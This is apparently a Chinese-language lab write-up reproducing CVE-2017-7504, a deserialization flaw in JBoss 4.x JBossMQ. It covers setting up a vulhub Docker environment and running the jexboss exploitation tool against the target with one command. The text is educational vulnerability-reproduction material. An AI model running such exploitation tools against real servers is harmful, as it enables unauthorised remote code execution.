JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504

漏洞描述

Red Hat JBoss Application Server是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中，JBossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞，攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

影响版本

JBoss AS 4.x及之前。

复现思路

漏洞复现

环境搭建：

git clone https://github.com/vulhub/vulhub.git
cd vulhub/jboss/CVE-2017-7504
docker-compose up -d

Jexboss工具：joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool (github.com)

git clone https://github.com/joaomatosf/jexboss.git

python3 jexboss.py -host http://<ip>:8080

成功利用漏洞执行命令。

文章许可：本文采用CC BY-NC-SA 4.0许可协议，转载请注明出处。

JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504#

漏洞描述#

影响版本#

复现思路#

漏洞复现#

JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504

漏洞描述

影响版本

复现思路

漏洞复现